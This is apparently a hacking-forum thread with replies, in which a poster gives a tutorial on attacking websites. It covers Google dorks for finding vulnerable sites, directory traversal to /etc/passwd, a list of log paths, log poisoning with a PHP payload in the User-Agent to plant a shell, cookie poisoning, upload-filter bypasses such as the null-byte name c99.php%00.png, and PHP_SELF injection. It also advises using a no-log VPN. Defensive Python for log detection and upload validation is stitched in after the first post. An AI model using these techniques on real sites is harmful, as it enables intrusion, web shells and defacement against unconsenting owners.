

Advanced Hacking Techniques #1
// Advanced Hacking Techniques //



Contents:
  • Intro
  • Tools You Need
  • Local File Inclusion (LFI) with Log Poisoning
  • Cookie Poisoning
  • Unrestricted File Upload and Filter Bypass
  • Exploiting $_SERVER['PHP_SELF']
  • Conclusion




// Intro //

Hello, @APPLEZ here. Some of you may know me as 0verlord, but you can call me either one. I've decided to share with you some of my personal favorite exploits. Enjoy!


As a web developer, you must be extremely careful as you code. If you forget to sanitize only one field or input on your site, it could be fatal. These are only a few of my favorite exploits; I find them very fun to accomplish. If you would like me to do a tutorial on any other exploits, please post below! Another noteworthy comment: If you do actually get a server shelled, and a website administrator deletes it, don't worry! Odds are, they don't even know how you got it there in the first place; a whopping 63% of website owners don't even know how you did it. Let's continue on, but please keep in mind that neither Sinister.ly nor I am responsible for what you do with this information; it's for educational purposes ONLY!


// Tools You Need //
  • Firefox
  • Tamper Data
  • Live HTTP Headers
  • A Badass Theme for Firefox
  • A VPN (Not a free vpn, a vpn with NO LOGS like http://privateinternetaccess.com)
  • Your favorite php shell

    // Local File Inclusion (With Log Poisoning) //
    This is my favorite exploit, by far. The goal of this is to first find the path of the error log, generate an error within the server with a spoofed user agent containing your php payload, then finally access the log file and your php payload will execute, allowing you to upload a shell, exploit kit, or simply deface the website. This will not work on all sites, if you were wondering. As always, details of this exploit will vary from site to site; not all sites have the same directories or log file names. Let's start by explaining the basics of LFI:

    1) Find a vulnerable site
    Here are a few LFI google dorks for you to get started:
    Code:
    inurl:contacts.php?page=
    inurl:index.php?page=
    inurl:include.php?file=
    inurl:catalog.php?catID=

    2) Test for vulnerability
    You've found a site with a URL similar to this:
    Code:
    http://www.website.com/index.php?catID=23&file=index.php

    You now need to edit the URL (after &file=) to look like this:
    Code:
    http://www.website.com/index.php?catID=23&file=../../../../../../../etc/passwd

    If it is vulnerable, some of the page should be replaced with some text similar to this:
    Code:
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/.......

    You may ask yourself, "HOLY SHIT! WTF HAPPENED?!?!?" The answer is simple.

    ../ tells the server you want to move up one directory. You want to move all the way up to the root directory, so you may need to add many of those.

    /etc/passwd is a file that at one time held the username and hashed password of every user on the system, but those days are gone. There's not much of a use for this file, except to test your LFI.

    You now can read any file on the server! But unless there's a particularly juicy file on the server you want to see, it may seem that LFI is pretty damn useless. That is not the case.

    3) Find an error log file
    This step is very vital to taking this exploit to the next level. An error log file may contain a person's IP, location, user-agent, and may reveal additional vulnerabilities on the site. But for our purposes, we will inject the log file with a php payload.

    Here are a few locations as to where it may be:
    Code:
    ../../../../../../../apache/logs/error.log
    ../../../../../../../apache/logs/access.log
    ../../../../../../../etc/httpd/logs/acces_log
    ../../../../../../../etc/httpd/logs/acces.log
    ../../../../../../../etc/httpd/logs/error_log
    ../../../../../../../etc/httpd/logs/error.log
    ../../../../../../../var/www/logs/access_log
    ../../../../../../../var/www/logs/access.log
    ../../../../../../../usr/local/apache/logs/access_log
    ../../../../../../../usr/local/apache/logs/access.log
    ../../../../../../../var/log/apache/access_log
    ../../../../../../../var/log/apache2/access_log
    ../../../../../../../var/log/apache/access.log
    ../../../../../../../var/log/apache2/access.log
    ../../../../../../../var/log/access_log
    ../../../../../../../var/log/access.log
    ../../../../../../../var/www/logs/error_log
    ../../../../../../../var/www/logs/error.log
    ../../../../../../../usr/local/apache/logs/error_log
    ../../../../../../../usr/local/apache/logs/error.log
    ../../../../../../../var/log/apache/error_log
    ../../../../../../../var/log/apache2/error_log
    ../../../../../../../var/log/apache/error.log
    ../../../../../../../var/log/apache2/error.log
    ../../../../../../../var/log/error_log
    ../../../../../../../var/log/error.log


    After you find the log file, you're golden! All you must do now is generate an error, and spoof some of the data you send to the server. For this you'll be using tamper data.


    4) Delivering the payload
    I cannot tell you every detail on how to do this; it requires trial and error (hopefully error :D ) There are numerous ways to deliver an error to a site. I'll be using SQLi to throw an error, for an example. You will be needing Tamper Data, mentioned near the beginning of the thread.

    Now, you have the SQLi vulnerability, but for this purpose we will not be exploiting it, just using it to create the error. Simply open Tamper Data, start the tamper, run your SQLied URL, and a pop-up box will appear. Click tamper. Now, in the user-agent field, replace your user-agent with your php payload. You can simply write a script to get cmd access, an upload script, or even your entire shell (I wouldn't recommend it though). Finally, tap that submit button, smoke a joint, and celebrate your success. The last step is to navigate to the log file once more, and your php payload should be executed.



    // Cookie Poisoning //
    Here is a 7 minute video to help explain what this is, and how to exploit it. Instead of using wtfever he's using on a very old windows computer, you can use Live HTTP Headers and Tamper Data.



    Basically, some websites store some information in your cookies, which should never be allowed client side. It's a fairly simple exploit, and takes some really noobish coding for a site to be vulnerable. This isn't limited to only changing fields in your cookie; you can also do SQLi and XSS, depending on the situation. With that being said, it's quite hard to tell you exactly what to do, since every website is most likely going to have different formats of cookies. Cookie poisoning is often overlooked; would you think someone could SQL inject your site with a mere cookie? If anyone needs additional information about this, feel free to post below with your question.



    // Unrestricted File Upload and Filter Bypass //

    Unrestricted file upload is just what it seems to be, the ability to upload any type of file, including php. There are tons of ways to do it, but I'll only review a few. This exploit is usually used in conjunction with FPD (Full Path Disclosure) to locate the file you uploaded.

    Method 1: JavaScript
    In some cases, the input is sanitized by using javascript. You should NEVER do that. To bypass, simply disable javascript on your browser.

    Method 2: The Null Byte
    You have discovered that the input is not sanitized by javascript, but by php. If only you could change the extension on your shell to a filetype accepted by the server, then make it disappear. Luckily, you CAN! The null byte, %00, makes the site disregard everything following it.
    Example:
    Code:
    c99.php.png

    changes to:
    Code:
    c99.php%00.png

    When uploaded, the .png part will be discarded. The null byte is a great tool for many types of filter bypass, including bypassing LFI filters.
    Example:
    Code:
    .%00./.%00./.%00./etc/passwd

    Method 3: File header verification
    This is where the server scans the file for its header, to identify what type of file it is. If the header matches anything in the filetype whitelist, it will be uploaded. If not, you'll have to do a little bit more work.

    Step 1:
    Let's say the server only allows png files. Using the last method, and combining it with this one, you should still be able to upload your shell. First, you need to find any png file.

    Step 2:
    Open the file with notepad++ (or another IDE). Now, copy and paste your shell at the very bottom of the file. Save the file as c99.php%00.png. The code may or may not be executed, it depends on the settings in the phpinfo.ini file. In some cases, it will work, and it's a very sneaky way of bypassing filters.



    // Exploitation of $_SERVER['PHP_SELF'] //

    $_SERVER['PHP_SELF'] is a variable in php that simply contains the current url of the webpage.
    Example:

    Current page:
    Code:
    http://website.com/penis/swag/yolo.php

    The $_SERVER['PHP_SELF'] variable contains:
    Code:
    penis/swag/yolo.php

    To exploit this, all you have to do is add your malicious code to the end of the url.
    Example:

    Code:
    http://website.com/forums/index.php <?php echo phpinfo(); ?>

    the PHP_SELF variable will contain and echo:
    Code:
    forums/index.php <?php echo phpinfo(); ?>

    Since most of the time $_SERVER['PHP_SELF'] is being echoed as an href for a button, the server will print out the directory, then print AND execute the malicious code. You can also do XSS with this.



    // Conclusion //

    If you have any questions, comments, suggestions, corrections, or concerns, feel free to either PM me or post below. If I have posted this in the wrong section, an admin will surely correct it. I hope you learned a thing or two. This thread will be revised and edited, maybe even added on to, if needed. I hope you enjoy this as much as I did!
    Thanks for reading,

    ~APPLEZ a.k.a. 0verlord <3

[+] 2 users Like APPLEZ's post
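From the defender's side, the LFI and log-poisoning sections above describe two things that show up in an Apache access log before any shell lands: a `file=`-style parameter carrying `../` sequences or a log/passwd path, and a request whose User-Agent (or Referer) carries a PHP open tag. The following is an added example, not code from the thread; it parses constructed combined-format log lines, percent-decodes them repeatedly so double-encoded payloads are normalised, flags those two signals, and then correlates them per client host, since a host that does both is the log-poisoning pattern rather than a stray scanner. The regexes, the sample log lines and the 203.0.113.x/198.51.100.x addresses are all constructed for this illustration.

```python
"""Detect LFI and log-poisoning attempts in Apache combined-format access logs.

Added example for the thread's LFI / log poisoning sections; not the
thread's own code. Log lines and rule patterns are constructed.
"""
from __future__ import annotations

import re
from urllib.parse import unquote

# Apache "combined" format:
#   host ident authuser [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: \S+)?" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
TRAVERSAL_RE = re.compile(r'\.\./|\.\.\\')                     # ../ or ..\
SENSITIVE_RE = re.compile(                                     # targets a traversal is aimed at
    r'/etc/(passwd|shadow)|/proc/self/|(access|error)[._]?log', re.I)
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.I)                   # PHP open tag in a header

# Constructed sample: one client probes /etc/passwd, sends a PHP tag as its
# User-Agent while triggering a 500, then reads the error log through the
# include parameter (double-encoded); a second client browses normally.
SAMPLE_LOG = [
    '203.0.113.7 - - [29/Jul/2014:02:17:11 +0000] "GET /index.php?catID=23&file=../../../../../../../etc/passwd HTTP/1.1" 200 1834 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [29/Jul/2014:02:18:02 +0000] "GET /index.php?catID=23%27 HTTP/1.1" 500 512 "-" "<?php echo 1; ?>"',
    '203.0.113.7 - - [29/Jul/2014:02:18:40 +0000] "GET /index.php?file=..%252f..%252f..%252fvar/log/apache2/error.log HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [29/Jul/2014:02:19:00 +0000] "GET /index.php?catID=23&file=about.php HTTP/1.1" 200 4310 "http://www.example.com/" "Mozilla/5.0"',
]


def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable so %252e%252e%252f becomes ../ like a lenient server would see it."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyse_line(line: str) -> dict | None:
    """Return {"host", "time", "findings"} for a parseable line, None otherwise."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = []
    path = decode_fully(m["path"])
    if TRAVERSAL_RE.search(path) or "\x00" in path:
        findings.append("traversal_or_null_byte")
    if SENSITIVE_RE.search(path):
        findings.append("sensitive_file_target")
    for field in ("agent", "referer"):      # the two header fields written into access logs
        if PHP_TAG_RE.search(decode_fully(m[field])):
            findings.append(f"php_tag_in_{field}")
    return {"host": m["host"], "time": m["time"], "findings": findings}


def scan(lines) -> list[dict]:
    """Records for every line that produced at least one finding."""
    return [rec for rec in map(analyse_line, lines) if rec and rec["findings"]]


def poisoning_candidates(records) -> list[str]:
    """Hosts that both sent a PHP tag in a logged header AND pulled a log/sensitive
    file through the include parameter: the two halves of log poisoning."""
    by_host: dict[str, set] = {}
    for rec in records:
        by_host.setdefault(rec["host"], set()).update(rec["findings"])
    return sorted(h for h, f in by_host.items()
                  if "sensitive_file_target" in f
                  and any(x.startswith("php_tag_in_") for x in f))


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for rec in hits:
        print(rec["time"], rec["host"], ", ".join(rec["findings"]))
    print("log-poisoning candidates:", poisoning_candidates(hits))
```

Run it against a real access log by replacing `SAMPLE_LOG` with `open(path)`; the `poisoning_candidates` correlation is what turns noisy single-line hits into something worth paging on, and the `traversal_or_null_byte` finding alone is the signal to verify that the include parameter is whitelisted rather than passed to `include()`.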
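The upload section above lists three filter weaknesses (client-side JavaScript checks, `%00` truncation of `c99.php%00.png`, and a PHP payload appended after a valid image header), and the `$_SERVER['PHP_SELF']` section describes a request path echoed unencoded into an `href`. The following is an added example, not code from the thread and not PHP: it is a Python stand-in for a server-side upload handler that closes each of those gaps (rejects NUL bytes, takes only the last extension and refuses executable inner extensions, checks magic bytes, scans for a PHP open tag, and stores under a server-chosen random name), plus a `form_action` helper that HTML-encodes the request path the way `htmlspecialchars()` would in PHP. The `ALLOWED` whitelist, the `EXECUTABLE` set and `PNG_SAMPLE` are assumptions constructed for the example.

```python
"""Hardened upload validation and safe echoing of the request path.

Added example for the thread's file-upload and PHP_SELF sections; not
the thread's own code. ALLOWED / EXECUTABLE / PNG_SAMPLE are constructed.
"""
import html
import os
import re
import secrets

# Assumed whitelist: extension -> magic bytes the content must start with.
ALLOWED = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "gif": b"GIF8"}
# Suffixes that must never appear anywhere in a stored name ("shell.php.png").
EXECUTABLE = {"php", "phtml", "php3", "php4", "php5", "phar", "htaccess"}
PHP_TAG_RE = re.compile(rb"<\?(php|=)", re.I)
# Constructed: a PNG signature plus filler, not a real image.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16


class UploadRejected(ValueError):
    pass


def validate_upload(client_filename: str, data: bytes) -> str:
    """Return a server-chosen storage name, or raise UploadRejected with the reason."""
    # 1. NUL bytes: libraries built on C strings truncate there, so
    #    "c99.php\0.png" could be written out as "c99.php". Reject outright.
    if "\x00" in client_filename or "%00" in client_filename:
        raise UploadRejected("null byte in filename")
    # 2. Only the final path component matters; separators never belong in an upload name.
    base = os.path.basename(client_filename.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        raise UploadRejected("no extension")
    # 3. Decide the type from the LAST suffix and check it against the whitelist ...
    ext = parts[-1]
    if ext not in ALLOWED:
        raise UploadRejected(f"extension {ext!r} not allowed")
    # 4. ... and refuse executable inner suffixes, which some Apache configs still honour.
    if any(p in EXECUTABLE for p in parts[:-1]):
        raise UploadRejected("executable inner extension")
    # 5. The body must carry the magic bytes of the claimed type ...
    if not data.startswith(ALLOWED[ext]):
        raise UploadRejected("content does not match extension")
    # 6. ... and must not contain a PHP open tag appended after a valid header.
    if PHP_TAG_RE.search(data):
        raise UploadRejected("embedded PHP tag")
    # 7. Never store under the client's name: random name, validated extension.
    return f"{secrets.token_hex(16)}.{ext}"


def classify(client_filename: str, data: bytes) -> str:
    """'accepted' or the rejection reason; convenient for tests and audit logs."""
    try:
        validate_upload(client_filename, data)
        return "accepted"
    except UploadRejected as exc:
        return str(exc)


def form_action(request_path: str) -> str:
    """Build a form action attribute from the request path with HTML encoding,
    the equivalent of htmlspecialchars($_SERVER['PHP_SELF']) in PHP."""
    return 'action="' + html.escape(request_path, quote=True) + '"'


if __name__ == "__main__":
    for name, body in [("c99.php%00.png", PNG_SAMPLE), ("c99.php.png", PNG_SAMPLE),
                       ("photo.png", PNG_SAMPLE + b"<?php echo 1; ?>"), ("photo.png", PNG_SAMPLE)]:
        print(f"{name:18} -> {classify(name, body)}")
    print(form_action('/forums/index.php/"><script>'))
```

Two points the code cannot express on its own: store accepted files outside the web root (or in a directory with script execution disabled) so that even a missed bypass cannot run, and note that the magic-bytes check is only a sanity check, since a valid PNG header followed by PHP is exactly the thread's Method 3, which is why step 6 scans the whole body.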

RE: Advanced Hacking Techniques #2
Very nice, very very hq!
I expect nothing less from 0verlord.
Amazing job on this tut Biggrin

I'm going to be using this a lot Biggrin

[+] 1 user Likes Senka's post

RE: Advanced Hacking Techniques #3
[sarcasm]You forgot to include the part about hacking ip adresses.[/sarcasm]
Nice post, I know you worked a while on it.

(Although I won't use it because I don't like hacking. Creation FTW)

[+] 1 user Likes ImmNinjaxD's post

RE: Advanced Hacking Techniques #4
Nice thread, Overlord.
I think it is the most 1337 thread i've ever seen in my life.
Senka (WF) Wrote:Ur black? o.0
"I don't do cocaine. I just like the way it smells" -Rucka Rucka Ali

[+] 1 user Likes Nucka_Tyler's post

RE: Advanced Hacking Techniques #5
Very HQ 0verlord. I'm sure this took hours to make Smile Dat sexy green text doe

[+] 1 user Likes Jlyon11's post

RE: Advanced Hacking Techniques #6
Thanks guys, my brain almost melted by the time I got done Wink

[+] 1 user Likes APPLEZ's post

RE: Advanced Hacking Techniques #7
Very nice thread, very informative.
Pay respects to the malformed SYN packet.

[+] 1 user Likes The_Joker's post

RE: Advanced Hacking Techniques #8
(07-29-2014, 02:17 AM)ImmNinjaxD (⌐■_■) Wrote: [sarcasm]You forgot to include the part about hacking ip adresses.[/sarcasm]
Nice post, I know you worked a while on it.

(Although I won't use it because I don't like hacking. Creation FTW)

look a leet hacker joke

op:
>Advanced

[+] 1 user Likes superMAUS's post

RE: Advanced Hacking Techniques #9
I stopped reading when I read

../ tells the server you want to move up one directory.

../ tells the server to go back a directory. It wouldn't make sense if there were 10 "../" when /etc/passwd is only 1 directory away from the root directory.
XMPP - wrath@xmpp.jp

[+] 1 user Likes Crypt's post

RE: Advanced Hacking Techniques #10
(07-31-2014, 10:48 PM)Crypt Wrote: I stopped reading when I read

../ tells the server you want to move up one directory.

../ tells the server to go back a directory. It wouldn't make sense if there were 10 "../" when /etc/passwd is only 1 directory away from the root directory.

Going up a directory and back are the same thing

Some sites have additional folders containing the home directory, ex. if the person did not put the home directory in the root of the machine

[+] 1 user Likes APPLEZ's post